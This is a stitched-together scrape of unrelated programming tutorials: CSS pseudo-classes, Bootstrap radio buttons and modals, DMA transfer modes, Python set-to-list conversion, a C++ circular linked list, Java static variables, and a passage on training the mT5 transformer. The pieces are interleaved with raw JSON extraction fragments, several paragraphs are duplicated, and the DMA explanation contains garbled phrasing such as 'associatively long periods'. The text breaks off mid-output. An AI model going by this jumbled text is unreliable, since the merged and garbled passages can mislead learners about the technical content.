"s": 799, "text": "The :first-child pseudo-class matches a specified element that is the first child of another element." }, { "code": null, "e": 1004, "s": 901, "text": "In the following example, the selector matches any <p> element that is the first child of any element:" }, { "code": null, "e": 1094, "s": 1004, "text": "In the following example, the selector matches the first <i> element in all <p> elements:" }, { "code": null, "e": 1219, "s": 1094, "text": "In the following example, the selector matches all <i> elements in <p> elements that are the first child of another element:" }, { "code": null, "e": 1302, "s": 1219, "text": "The :lang pseudo-class allows you to define special rules for different languages." }, { "code": null, "e": 1391, "s": 1302, "text": "In the example below, :lang defines the quotation marks for <q> elements with lang=\"no\":" }, { "code": null, "e": 1491, "s": 1391, "text": "Add different styles to hyperlinks\nThis example demonstrates how to add other styles to hyperlinks." }, { "code": null, "e": 1567, "s": 1491, "text": "Use of :focus\nThis example demonstrates how to use the :focus pseudo-class." }, { "code": null, "e": 1628, "s": 1567, "text": "Set the background-color to red, when you mouse over a link." }, { "code": null, "e": 1801, "s": 1628, "text": "<style>\n {\n background-color: red;\n}\n</style>\n\n<body>\n\n<h1>This is a header.</h1>\n<p>This is a paragraph.</p>\n<a href=\"https://w3schools.com\">This is a link.</a>\n\n</body>\n" }, { "code": null, "e": 1820, "s": 1801, "text": "Start the Exercise" }, { "code": null, "e": 1853, "s": 1820, "text": "We just launchedW3Schools videos" }, { "code": null, "e": 1895, "s": 1853, "text": "Get certifiedby completinga course today!" }, { "code": null, "e": 2002, "s": 1895, "text": "If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail:" }, { "code": null, "e": 2021, "s": 2002, "text": "[email protected]" } ]
Bootstrap radio class
Use radio class if you want to limit the user to just one selection. Use .radio-inline class to a series of radios for controls appears on the same line. You can try to run the following code to implement the Bootstrap radio class &mminus; Live Demo <!DOCTYPE html> <html> <head> <title>Bootstrap Forms</title> <meta name = "viewport" content = "width=device-width, initial-scale = 1"> <link rel = "stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css"> <script src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <script src = "https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script> </head> <body> <label for = "name"></label>Favourite Sports</label> <div class = "radio"> <label> <input type = "radio" name = "optionsRadios" id = "optionsRadios1" value = "option1" checked> Cricket </label> </div> <div class = "radio"> <label> <input type = "radio" name = "optionsRadios" id = "optionsRadios2" value = "option2"> Football </label> </div> </body> </html>
[ { "code": null, "e": 1216, "s": 1062, "text": "Use radio class if you want to limit the user to just one selection. Use .radio-inline class to a series of radios for controls appears on the same line." }, { "code": null, "e": 1302, "s": 1216, "text": "You can try to run the following code to implement the Bootstrap radio class &mminus;" }, { "code": null, "e": 1312, "s": 1302, "text": "Live Demo" }, { "code": null, "e": 2262, "s": 1312, "text": "<!DOCTYPE html>\n<html>\n <head>\n <title>Bootstrap Forms</title>\n <meta name = \"viewport\" content = \"width=device-width, initial-scale = 1\">\n <link rel = \"stylesheet\" href=\"https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css\">\n <script src = \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n <script src = \"https://stackpath.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js\"></script>\n </head>\n <body>\n <label for = \"name\"></label>Favourite Sports</label>\n <div class = \"radio\">\n <label>\n <input type = \"radio\" name = \"optionsRadios\" id = \"optionsRadios1\" value = \"option1\" checked> Cricket\n </label>\n </div>\n <div class = \"radio\">\n <label>\n <input type = \"radio\" name = \"optionsRadios\" id = \"optionsRadios2\" value = \"option2\">\n Football\n </label>\n </div>\n </body>\n</html>" } ]
Explain the various DMA transfer modes in computer architecture?
DMA represents Direct Memory Access. It is a hardware-controlled data transfer method. An external device can control data transfer. The external device creates address and control signals that are needed to control data transfer. External devices also enable peripheral devices to directly access memory. The external device which controls the data transfer is known as the DMA controller. There are three different modes of DMA data transfer which are as follows − Burst Mode − In burst mode, a whole block of data is shared in one contiguous sequence. Since the DMA controller is allowed access to the system buses by the CPU, it sends all bytes of data in the data block earlier yield control of the system buses back to the CPU. This mode is beneficial for loading programs or data records into memory, but it does provide the CPU inactive for associatively long periods. Burst Mode − In burst mode, a whole block of data is shared in one contiguous sequence. Since the DMA controller is allowed access to the system buses by the CPU, it sends all bytes of data in the data block earlier yield control of the system buses back to the CPU. This mode is beneficial for loading programs or data records into memory, but it does provide the CPU inactive for associatively long periods. Cycle Stealing mode − In cycle stealing mode, the DMA controller gets access to the system buses as in burst mode, using the BR and BG signals. It can share one byte of information and then deasserts BR, returning control of the system buses to the CPU. It already issues requests via BR, sharing one byte of information per request, just before it has shared its whole block of data. Cycle Stealing mode − In cycle stealing mode, the DMA controller gets access to the system buses as in burst mode, using the BR and BG signals. It can share one byte of information and then deasserts BR, returning control of the system buses to the CPU. It already issues requests via BR, sharing one byte of information per request, just before it has shared its whole block of data. By frequently obtaining and free control of the system buses, the DMA controller substantially interleaves instructions and data transfers. The CPU processes an instruction, then the DMA controller sends a data value, thus the CPU processes another instruction, then the DMA controller sends another data value, etc. Transparent Mode − Transparent mode needed the most time to share a block of data, yet it is also important in terms of whole system performance. In transparent mode, the DMA controller only shares data when the CPU is implementing operations that do not use the system buses. For example, the relatively simple CPU has multiple states that change or process data only within the CPU − Transparent Mode − Transparent mode needed the most time to share a block of data, yet it is also important in terms of whole system performance. In transparent mode, the DMA controller only shares data when the CPU is implementing operations that do not use the system buses. For example, the relatively simple CPU has multiple states that change or process data only within the CPU − NOP1:(No Operation) LDAC5:AC←DR JUMP3:PC←DR,TR CLAC1:AC←0,Z←1 The benefit of transparent mode is that the CPU never stops implementing its programs. The DMA transfer is complementary in terms of time. The hardware requires to decide when the CPU is not utilizing the buses can be fully complex and relatively costly. In addition, more advanced CPUs overlap their internal services and use the system but virtually every cycle.
[ { "code": null, "e": 1453, "s": 1062, "text": "DMA represents Direct Memory Access. It is a hardware-controlled data transfer method. An external device can control data transfer. The external device creates address and control signals that are needed to control data transfer. External devices also enable peripheral devices to directly access memory. The external device which controls the data transfer is known as the DMA controller." }, { "code": null, "e": 1529, "s": 1453, "text": "There are three different modes of DMA data transfer which are as follows −" }, { "code": null, "e": 1939, "s": 1529, "text": "Burst Mode − In burst mode, a whole block of data is shared in one contiguous sequence. Since the DMA controller is allowed access to the system buses by the CPU, it sends all bytes of data in the data block earlier yield control of the system buses back to the CPU. This mode is beneficial for loading programs or data records into memory, but it does provide the CPU inactive for associatively long periods." }, { "code": null, "e": 2349, "s": 1939, "text": "Burst Mode − In burst mode, a whole block of data is shared in one contiguous sequence. Since the DMA controller is allowed access to the system buses by the CPU, it sends all bytes of data in the data block earlier yield control of the system buses back to the CPU. This mode is beneficial for loading programs or data records into memory, but it does provide the CPU inactive for associatively long periods." }, { "code": null, "e": 2734, "s": 2349, "text": "Cycle Stealing mode − In cycle stealing mode, the DMA controller gets access to the system buses as in burst mode, using the BR and BG signals. It can share one byte of information and then deasserts BR, returning control of the system buses to the CPU. It already issues requests via BR, sharing one byte of information per request, just before it has shared its whole block of data." }, { "code": null, "e": 3119, "s": 2734, "text": "Cycle Stealing mode − In cycle stealing mode, the DMA controller gets access to the system buses as in burst mode, using the BR and BG signals. It can share one byte of information and then deasserts BR, returning control of the system buses to the CPU. It already issues requests via BR, sharing one byte of information per request, just before it has shared its whole block of data." }, { "code": null, "e": 3436, "s": 3119, "text": "By frequently obtaining and free control of the system buses, the DMA controller substantially interleaves instructions and data transfers. The CPU processes an instruction, then the DMA controller sends a data value, thus the CPU processes another instruction, then the DMA controller sends another data value, etc." }, { "code": null, "e": 3822, "s": 3436, "text": "Transparent Mode − Transparent mode needed the most time to share a block of data, yet it is also important in terms of whole system performance. In transparent mode, the DMA controller only shares data when the CPU is implementing operations that do not use the system buses. For example, the relatively simple CPU has multiple states that change or process data only within the CPU −" }, { "code": null, "e": 4208, "s": 3822, "text": "Transparent Mode − Transparent mode needed the most time to share a block of data, yet it is also important in terms of whole system performance. In transparent mode, the DMA controller only shares data when the CPU is implementing operations that do not use the system buses. For example, the relatively simple CPU has multiple states that change or process data only within the CPU −" }, { "code": null, "e": 4270, "s": 4208, "text": "NOP1:(No Operation)\nLDAC5:AC←DR\nJUMP3:PC←DR,TR\nCLAC1:AC←0,Z←1" }, { "code": null, "e": 4635, "s": 4270, "text": "The benefit of transparent mode is that the CPU never stops implementing its programs. The DMA transfer is complementary in terms of time. The hardware requires to decide when the CPU is not utilizing the buses can be fully complex and relatively costly. In addition, more advanced CPUs overlap their internal services and use the system but virtually every cycle." } ]
Python | Convert set into a list - GeeksforGeeks
22 Jul, 2019 Given a set, write a Python program to convert the given set into list. Examples: Input : {1, 2, 3, 4} Output : [1, 2, 3, 4] Input : {'Geeks', 'for', 'geeks'} Output : ['Geeks', 'for', 'geeks'] Approach #1 : Using list(set_name). Typecasting to list can be done by simply using list(set_name). # Python3 program to convert a # set into a listmy_set = {'Geeks', 'for', 'geeks'} s = list(my_set)print(s) ['Geeks', 'for', 'geeks'] # Python3 program to convert a # set into a listdef convert(set): return list(set) # Driver functions = set({1, 2, 3})print(convert(s)) [1, 2, 3] Approach #2 : using sorted() method Using sorted() function will convert the set into list in a defined order. The only drawback of this method is that the elements of the set need to be sortable. # Python3 program to convert a # set into a listdef convert(set): return sorted(set) # Driver functionmy_set = {1, 2, 3} s = set(my_set)print(convert(s)) [1, 2, 3] Approach #3 : Using [*set, ]This essentially unpacks the set s inside a list literal which is created due to the presence of the single comma (, ). This approach is a bit faster but suffers from readability. # Python3 program to convert a # set into a listdef convert(set): return [*set, ] # Driver functions = set({1, 2, 3})print(convert(s)) [1, 2, 3] ManasChhabra2 Python list-programs Python set-programs Python Python Programs Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Read a file line by line in Python Enumerate() in Python How to Install PIP on Windows ? Different ways to create Pandas Dataframe Python String | replace() Defaultdict in Python Python | Get dictionary keys as a list Python | Split string into list of characters Python program to check whether a number is Prime or not Python | Convert a list to dictionary
[ { "code": null, "e": 23771, "s": 23743, "text": "\n22 Jul, 2019" }, { "code": null, "e": 23843, "s": 23771, "text": "Given a set, write a Python program to convert the given set into list." }, { "code": null, "e": 23853, "s": 23843, "text": "Examples:" }, { "code": null, "e": 23967, "s": 23853, "text": "Input : {1, 2, 3, 4}\nOutput : [1, 2, 3, 4]\n\nInput : {'Geeks', 'for', 'geeks'}\nOutput : ['Geeks', 'for', 'geeks']\n" }, { "code": null, "e": 24004, "s": 23967, "text": " Approach #1 : Using list(set_name)." }, { "code": null, "e": 24068, "s": 24004, "text": "Typecasting to list can be done by simply using list(set_name)." }, { "code": "# Python3 program to convert a # set into a listmy_set = {'Geeks', 'for', 'geeks'} s = list(my_set)print(s)", "e": 24177, "s": 24068, "text": null }, { "code": null, "e": 24204, "s": 24177, "text": "['Geeks', 'for', 'geeks']\n" }, { "code": "# Python3 program to convert a # set into a listdef convert(set): return list(set) # Driver functions = set({1, 2, 3})print(convert(s))", "e": 24346, "s": 24206, "text": null }, { "code": null, "e": 24357, "s": 24346, "text": "[1, 2, 3]\n" }, { "code": null, "e": 24394, "s": 24357, "text": " Approach #2 : using sorted() method" }, { "code": null, "e": 24555, "s": 24394, "text": "Using sorted() function will convert the set into list in a defined order. The only drawback of this method is that the elements of the set need to be sortable." }, { "code": "# Python3 program to convert a # set into a listdef convert(set): return sorted(set) # Driver functionmy_set = {1, 2, 3} s = set(my_set)print(convert(s))", "e": 24714, "s": 24555, "text": null }, { "code": null, "e": 24725, "s": 24714, "text": "[1, 2, 3]\n" }, { "code": null, "e": 24934, "s": 24725, "text": " Approach #3 : Using [*set, ]This essentially unpacks the set s inside a list literal which is created due to the presence of the single comma (, ). This approach is a bit faster but suffers from readability." }, { "code": "# Python3 program to convert a # set into a listdef convert(set): return [*set, ] # Driver functions = set({1, 2, 3})print(convert(s))", "e": 25073, "s": 24934, "text": null }, { "code": null, "e": 25084, "s": 25073, "text": "[1, 2, 3]\n" }, { "code": null, "e": 25098, "s": 25084, "text": "ManasChhabra2" }, { "code": null, "e": 25119, "s": 25098, "text": "Python list-programs" }, { "code": null, "e": 25139, "s": 25119, "text": "Python set-programs" }, { "code": null, "e": 25146, "s": 25139, "text": "Python" }, { "code": null, "e": 25162, "s": 25146, "text": "Python Programs" }, { "code": null, "e": 25260, "s": 25162, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 25269, "s": 25260, "text": "Comments" }, { "code": null, "e": 25282, "s": 25269, "text": "Old Comments" }, { "code": null, "e": 25317, "s": 25282, "text": "Read a file line by line in Python" }, { "code": null, "e": 25339, "s": 25317, "text": "Enumerate() in Python" }, { "code": null, "e": 25371, "s": 25339, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 25413, "s": 25371, "text": "Different ways to create Pandas Dataframe" }, { "code": null, "e": 25439, "s": 25413, "text": "Python String | replace()" }, { "code": null, "e": 25461, "s": 25439, "text": "Defaultdict in Python" }, { "code": null, "e": 25500, "s": 25461, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 25546, "s": 25500, "text": "Python | Split string into list of characters" }, { "code": null, "e": 25603, "s": 25546, "text": "Python program to check whether a number is Prime or not" } ]
C++ Program to Implement Circular Singly Linked List
Circular singly linked list is a type of data structure that is made up of nodes that are created using self referential structures. Each of these nodes contain two parts, namely the data and the reference to the next list node. Only the reference to the first list node is required to access the whole linked list. This is known as the head. The last node in the list points to head or first node of the list. That is the reason this is known as a circular linked list. A program to implement circular singly linked list is given as follows. Live Demo #include <iostream> using namespace std; struct Node { int data; struct Node *next; }; struct Node* head = NULL; void insert(int newdata) { struct Node *newnode = (struct Node *)malloc(sizeof(struct Node)); struct Node *ptr = head; newnode->data = newdata; newnode->next = head; if (head!= NULL) { while (ptr->next != head) ptr = ptr->next; ptr->next = newnode; } else newnode->next = newnode; head = newnode; } void display() { struct Node* ptr; ptr = head; do { cout<<ptr->data <<" "; ptr = ptr->next; } while(ptr != head); } int main() { insert(3); insert(1); insert(7); insert(2); insert(9); cout<<"The circular linked list is: "; display(); return 0; } The circular linked list is: 9 2 7 1 3 In the above program, the structure Node forms the linked list node. It contains the data and a pointer to the next linked list node. This is given as follows. struct Node { int data; struct Node *next; }; The function insert() inserts the data into the beginning of the linked list. It creates a newnode and inserts the number in the data field of the newnode. If the head is NULL, then newnode points to itself otherwise the last node in the circular linked list points to newnode. Then the head points to the start of the list i.e. to the newnode. This is given below. void insert(int newdata) { struct Node *newnode = (struct Node *)malloc(sizeof(struct Node)); struct Node *ptr = head; newnode->data = newdata; newnode->next = head; if (head!= NULL) { while (ptr->next != head) ptr = ptr->next; ptr->next = newnode; } else newnode->next = newnode; head = newnode; } The function display() displays the whole linked list. First ptr points to head. Then it is continuously forwarded to the next node until all the data values of the nodes are printed. This is given below. void display() { struct Node* ptr; ptr = head; do { cout<< ptr->data <<" "; ptr = ptr->next; } while(ptr != head); } In the function main(), first various values are inserted into the circular linked list by calling insert(). Then the linked list is displayed. This is given below. int main() { insert(3); insert(1); insert(7); insert(2); insert(9); cout<<"The circular linked list is: "; display(); return 0; }
[ { "code": null, "e": 1291, "s": 1062, "text": "Circular singly linked list is a type of data structure that is made up of nodes that are created using self referential structures. Each of these nodes contain two parts, namely the data and the reference to the next list node." }, { "code": null, "e": 1533, "s": 1291, "text": "Only the reference to the first list node is required to access the whole linked list. This is known as the head. The last node in the list points to head or first node of the list. That is the reason this is known as a circular linked list." }, { "code": null, "e": 1605, "s": 1533, "text": "A program to implement circular singly linked list is given as follows." }, { "code": null, "e": 1616, "s": 1605, "text": " Live Demo" }, { "code": null, "e": 2370, "s": 1616, "text": "#include <iostream>\nusing namespace std;\nstruct Node {\n int data;\n struct Node *next;\n};\nstruct Node* head = NULL;\nvoid insert(int newdata) {\n struct Node *newnode = (struct Node *)malloc(sizeof(struct Node));\n struct Node *ptr = head;\n newnode->data = newdata;\n newnode->next = head;\n if (head!= NULL) {\n while (ptr->next != head)\n ptr = ptr->next;\n ptr->next = newnode;\n } else\n newnode->next = newnode;\n head = newnode;\n}\nvoid display() {\n struct Node* ptr;\n ptr = head;\n do {\n cout<<ptr->data <<\" \";\n ptr = ptr->next;\n } while(ptr != head);\n}\nint main() {\n insert(3);\n insert(1);\n insert(7);\n insert(2);\n insert(9);\n cout<<\"The circular linked list is: \";\n display();\n return 0;\n}" }, { "code": null, "e": 2409, "s": 2370, "text": "The circular linked list is: 9 2 7 1 3" }, { "code": null, "e": 2569, "s": 2409, "text": "In the above program, the structure Node forms the linked list node. It contains the data and a pointer to the next linked list node. This is given as follows." }, { "code": null, "e": 2621, "s": 2569, "text": "struct Node {\n int data;\n struct Node *next;\n};" }, { "code": null, "e": 2987, "s": 2621, "text": "The function insert() inserts the data into the beginning of the linked list. It creates a newnode and inserts the number in the data field of the newnode. If the head is NULL, then newnode points to itself otherwise the last node in the circular linked list points to newnode. Then the head points to the start of the list i.e. to the newnode. This is given below." }, { "code": null, "e": 3328, "s": 2987, "text": "void insert(int newdata) {\n struct Node *newnode = (struct Node *)malloc(sizeof(struct Node));\n struct Node *ptr = head;\n newnode->data = newdata;\n newnode->next = head;\n if (head!= NULL) {\n while (ptr->next != head)\n ptr = ptr->next;\n ptr->next = newnode;\n } else\n newnode->next = newnode;\n head = newnode;\n}" }, { "code": null, "e": 3533, "s": 3328, "text": "The function display() displays the whole linked list. First ptr points to head. Then it is continuously forwarded to the next node until all the data values of the nodes are printed. This is given below." }, { "code": null, "e": 3674, "s": 3533, "text": "void display() {\n struct Node* ptr;\n ptr = head;\n do {\n cout<< ptr->data <<\" \";\n ptr = ptr->next;\n } while(ptr != head);\n}" }, { "code": null, "e": 3839, "s": 3674, "text": "In the function main(), first various values are inserted into the circular linked list by calling insert(). Then the linked list is displayed. This is given below." }, { "code": null, "e": 3993, "s": 3839, "text": "int main() {\n insert(3);\n insert(1);\n insert(7);\n insert(2);\n insert(9);\n cout<<\"The circular linked list is: \";\n display();\n return 0;\n}" } ]
Static variables in Java
Class variables also known as static variables are declared with the static keyword in a class, but outside a method, constructor or a block. Class variables also known as static variables are declared with the static keyword in a class, but outside a method, constructor or a block. There would only be one copy of each class variable per class, regardless of how many objects are created from it. There would only be one copy of each class variable per class, regardless of how many objects are created from it. Static variables are rarely used other than being declared as constants. Constants are variables that are declared as public/private, final, and static. Constant variables never change from their initial value. Static variables are rarely used other than being declared as constants. Constants are variables that are declared as public/private, final, and static. Constant variables never change from their initial value. Static variables are stored in the static memory. It is rare to use static variables other than declared final and used as either public or private constants. Static variables are stored in the static memory. It is rare to use static variables other than declared final and used as either public or private constants. Static variables are created when the program starts and destroyed when the program stops. Static variables are created when the program starts and destroyed when the program stops. Visibility is similar to instance variables. However, most static variables are declared public since they must be available for users of the class. Visibility is similar to instance variables. However, most static variables are declared public since they must be available for users of the class. Default values are same as instance variables. For numbers, the default value is 0; for Booleans, it is false; and for object references, it is null. Values can be assigned during the declaration or within the constructor. Additionally, values can be assigned in special static initializer blocks. Default values are same as instance variables. For numbers, the default value is 0; for Booleans, it is false; and for object references, it is null. Values can be assigned during the declaration or within the constructor. Additionally, values can be assigned in special static initializer blocks. Static variables can be accessed by calling with the class name ClassName.VariableName. Static variables can be accessed by calling with the class name ClassName.VariableName. When declaring class variables as public static final, then variable names (constants) are all in upper case. If the static variables are not public and final, the naming syntax is the same as instance and local variables. When declaring class variables as public static final, then variable names (constants) are all in upper case. If the static variables are not public and final, the naming syntax is the same as instance and local variables. Online Demo import java.io.*; public class Employee { // salary variable is a private static variable private static double salary; // DEPARTMENT is a constant public static final String DEPARTMENT = "Development "; public static void main(String args[]) { salary = 1000; System.out.println(DEPARTMENT + "average salary:" + salary); } } This will produce the following result − Development average salary:1000 Note − If the variables are accessed from an outside class, the constant should be accessed as Employee.DEPARTMENT
[ { "code": null, "e": 1204, "s": 1062, "text": "Class variables also known as static variables are declared with the static keyword in a class, but outside a method, constructor or a block." }, { "code": null, "e": 1346, "s": 1204, "text": "Class variables also known as static variables are declared with the static keyword in a class, but outside a method, constructor or a block." }, { "code": null, "e": 1461, "s": 1346, "text": "There would only be one copy of each class variable per class, regardless of how many objects are created from it." }, { "code": null, "e": 1576, "s": 1461, "text": "There would only be one copy of each class variable per class, regardless of how many objects are created from it." }, { "code": null, "e": 1787, "s": 1576, "text": "Static variables are rarely used other than being declared as constants. Constants are variables that are declared as public/private, final, and static. Constant variables never change from their initial value." }, { "code": null, "e": 1998, "s": 1787, "text": "Static variables are rarely used other than being declared as constants. Constants are variables that are declared as public/private, final, and static. Constant variables never change from their initial value." }, { "code": null, "e": 2157, "s": 1998, "text": "Static variables are stored in the static memory. It is rare to use static variables other than declared final and used as either public or private constants." }, { "code": null, "e": 2316, "s": 2157, "text": "Static variables are stored in the static memory. It is rare to use static variables other than declared final and used as either public or private constants." }, { "code": null, "e": 2407, "s": 2316, "text": "Static variables are created when the program starts and destroyed when the program stops." }, { "code": null, "e": 2498, "s": 2407, "text": "Static variables are created when the program starts and destroyed when the program stops." }, { "code": null, "e": 2647, "s": 2498, "text": "Visibility is similar to instance variables. However, most static variables are declared public since they must be available for users of the class." }, { "code": null, "e": 2796, "s": 2647, "text": "Visibility is similar to instance variables. However, most static variables are declared public since they must be available for users of the class." }, { "code": null, "e": 3094, "s": 2796, "text": "Default values are same as instance variables. For numbers, the default value is 0; for Booleans, it is false; and for object references, it is null. Values can be assigned during the declaration or within the constructor. Additionally, values can be assigned in special static initializer blocks." }, { "code": null, "e": 3392, "s": 3094, "text": "Default values are same as instance variables. For numbers, the default value is 0; for Booleans, it is false; and for object references, it is null. Values can be assigned during the declaration or within the constructor. Additionally, values can be assigned in special static initializer blocks." }, { "code": null, "e": 3480, "s": 3392, "text": "Static variables can be accessed by calling with the class name ClassName.VariableName." }, { "code": null, "e": 3568, "s": 3480, "text": "Static variables can be accessed by calling with the class name ClassName.VariableName." }, { "code": null, "e": 3791, "s": 3568, "text": "When declaring class variables as public static final, then variable names (constants) are all in upper case. If the static variables are not public and final, the naming syntax is the same as instance and local variables." }, { "code": null, "e": 4014, "s": 3791, "text": "When declaring class variables as public static final, then variable names (constants) are all in upper case. If the static variables are not public and final, the naming syntax is the same as instance and local variables." }, { "code": null, "e": 4026, "s": 4014, "text": "Online Demo" }, { "code": null, "e": 4385, "s": 4026, "text": "import java.io.*;\npublic class Employee {\n\n // salary variable is a private static variable\n private static double salary;\n\n // DEPARTMENT is a constant\n public static final String DEPARTMENT = \"Development \";\n\n public static void main(String args[]) {\n salary = 1000;\n System.out.println(DEPARTMENT + \"average salary:\" + salary);\n }\n}" }, { "code": null, "e": 4426, "s": 4385, "text": "This will produce the following result −" }, { "code": null, "e": 4458, "s": 4426, "text": "Development average salary:1000" }, { "code": null, "e": 4573, "s": 4458, "text": "Note − If the variables are accessed from an outside class, the constant should be accessed as Employee.DEPARTMENT" } ]
Set large modal in Bootstrap
Use the .modal-lg class in Bootstrap to set large modal with more width. You can try to run the following code to set large modal; Live Demo <!DOCTYPE html> <html> <head> <title>Bootstrap Example</title> <link rel = "stylesheet" href = "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> <script src = "https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script> <script src = "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> </head> <body> <div class = "container"> <h2>Examination</h2> <button type = "button" class = "btn btn-lg" data-toggle = "modal" data-target="#new">Result</button> <div class = "modal fade" id = "new" role = "dialog"> <div class = "modal-dialog modal-lg"> <div class = "modal-content"> <div class = "modal-header"> <button type = "button" class="close" data-dismiss = "modal">×</button> <h4 class = "modal-title">Warning</h4> </div> <div class = "modal-body"> <p>If JavaScript isn't enabled in your web browser, then you may not be able to see the result.</p> </div> <div class = "modal-footer"> <button type = "button" class = "btn btn-primary" data-dismiss = "modal">Close</button> </div> </div> </div> </div> </div> </body> </html>
[ { "code": null, "e": 1135, "s": 1062, "text": "Use the .modal-lg class in Bootstrap to set large modal with more width." }, { "code": null, "e": 1193, "s": 1135, "text": "You can try to run the following code to set large modal;" }, { "code": null, "e": 1203, "s": 1193, "text": "Live Demo" }, { "code": null, "e": 2627, "s": 1203, "text": "<!DOCTYPE html>\n<html>\n <head>\n <title>Bootstrap Example</title>\n <link rel = \"stylesheet\" href = \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\">\n <script src = \"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\n <script src = \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"></script>\n </head>\n <body>\n <div class = \"container\">\n <h2>Examination</h2>\n <button type = \"button\" class = \"btn btn-lg\" data-toggle = \"modal\" data-target=\"#new\">Result</button>\n <div class = \"modal fade\" id = \"new\" role = \"dialog\">\n <div class = \"modal-dialog modal-lg\">\n <div class = \"modal-content\">\n <div class = \"modal-header\"> \n <button type = \"button\" class=\"close\" data-dismiss = \"modal\">×</button>\n <h4 class = \"modal-title\">Warning</h4>\n </div>\n <div class = \"modal-body\">\n <p>If JavaScript isn't enabled in your web browser, then you may not be able to see the result.</p>\n </div>\n <div class = \"modal-footer\">\n <button type = \"button\" class = \"btn btn-primary\" data-dismiss = \"modal\">Close</button>\n </div>\n </div>\n </div>\n </div>\n </div>\n </body>\n</html>" } ]
Going Global —How to Multi-Task in Multiple Languages with the mT5 Transformer | by Thilina Rajapakse | Towards Data Science
The original T5 (Text-To-Text Transfer Transformer) model achieved state-of-the-art performance on a variety of NLP benchmarks by leveraging a unified text-to-text format and a gigantic training dataset (C4). With the unified text-to-text approach, all downstream tasks were reframed such that both the input and the output of the model are text sequences. At a whopping 750 GB, the C4 (Colossal Clean Crawled Corpus) dataset was orders of magnitude larger than most existing datasets. Released back in October 2019 by Google, T5 still sits pretty at the top of the SuperGLUE benchmark as a testament to its capabilities. More information regarding the original T5 implementation and how to use it can be found in my article below. towardsdatascience.com As impressive as T5 was (and still is), it was trained entirely on English text and therefore, can only be used for English-language tasks. Sadly, this leaves out some 80% of the world population who don’t speak English. The mT5 model is a multilingual variant of the original T5 model, aimed at remedying this problem. mT5 closely follows the architecture and the training procedure of T5 but is trained on mC4 (~26 Terabytes!), a multilingual variant of the C4 dataset. It retains all the advantages of T5, but it also supports a total of 101 different languages! MT5 reframes any NLP task as a text-to-text task, which means that both the input and the output are text sequences. Just like with T5, the task to be performed can be specified by adding a prefix (a small text sequence) to the start of the sequence as shown below. However, unlike T5, the mT5 model can also be trained on datasets in languages other than English. Even more impressively, mT5 is also capable of cross-lingual, zero-shot transfer learning, i.e., the model is trained on an English dataset for a specific task, but it also learns to perform that task in other languages. This is quite useful when a certain dataset is only available in English, but you need it to work in another language (or multiple other languages)! In this article, we will focus on the zero-shot transfer learning ability of mT5. We’ll also do a quick comparison of its performance against T5 on English data. We’ll be doing all of this with the Simple Transformers library. In a previous article, I have trained a T5 model on the 3 tasks below: Binary classification — Yelp Reviews DatasetMultilabel classification — Toxic Comments datasetSentence similarity (sentence pair regression) — STS-B dataset Binary classification — Yelp Reviews Dataset Multilabel classification — Toxic Comments dataset Sentence similarity (sentence pair regression) — STS-B dataset towardsdatascience.com We’ll be using the same tasks and datasets to train our mT5 model so that we can easily make the comparison between mT5 and T5. To test the zero-shot transfer learning, we’ll focus on the first task. We’ll translate each testing example of the Yelp dataset to five different languages and see how well the model performs on the translated data. The five languages will be DutchGermanFrenchSwedishSpanish Dutch German French Swedish Spanish We’ll be using MarianMT models to translate the text, which are also available through Simple Transformers! Note: You can find all the code in this article in the examples/t5/mt5 directory (link) of the Simple Transformers Github repo. Since we are going to be working with 3 datasets, we’ll put them in 3 separate subdirectories inside the data directory. data/binary_classification data/multilabel_classification data/regression Download the Yelp Reviews Dataset.Extract train.csv and test.csv to data/binary_classification.Download the Toxic Comments dataset.Extract the csv files to data/multilabel_classification.Download the STS-B dataset.Extract the csv files to data/regression. Download the Yelp Reviews Dataset. Extract train.csv and test.csv to data/binary_classification. Download the Toxic Comments dataset. Extract the csv files to data/multilabel_classification. Download the STS-B dataset. Extract the csv files to data/regression. The task to be performed by an mT5 model is specified by the prefix prepended to the input. Because of this, the input data format for an mT5 model (or a T5 model) in Simple Transformers is a Pandas dataframe with the 3 columns — prefix, input_text, and target_text. This makes it easy to combine all 3 of our datasets into a single dataframe, as we can simply assign a prefix value to each task and use that to differentiate between the 3 tasks. In this case, the three prefixes are as follows: binary classificationmultilabel classificationsimilarity binary classification multilabel classification similarity import pandas as pd import json from sklearn.model_selection import train_test_split prefix = 'data/binary_classification/' binary_train_df = pd.read_csv(prefix + 'train.csv', header=None) binary_train_df.head() binary_eval_df = pd.read_csv(prefix + 'test.csv', header=None) binary_eval_df.head() binary_train_df[0] = (binary_train_df[0] == 2).astype(int) binary_eval_df[0] = (binary_eval_df[0] == 2).astype(int) binary_train_df = pd.DataFrame({ 'prefix': ["binary classification" for i in range(len(binary_train_df))], 'input_text': binary_train_df[1].str.replace('\n', ' '), 'target_text': binary_train_df[0].astype(str), }) print(binary_train_df.head()) binary_eval_df = pd.DataFrame({ 'prefix': ["binary classification" for i in range(len(binary_eval_df))], 'input_text': binary_eval_df[1].str.replace('\n', ' '), 'target_text': binary_eval_df[0].astype(str), }) print(binary_eval_df.head()) prefix input_text \ 0 binary classification Unfortunately, the frustration of being Dr. Go... 1 binary classification Been going to Dr. Goldberg for over 10 years. ... 2 binary classification I don't know what Dr. Goldberg was like before... 3 binary classification I'm writing this review to give you a heads up... 4 binary classification All the food is great here. But the best thing... target_text 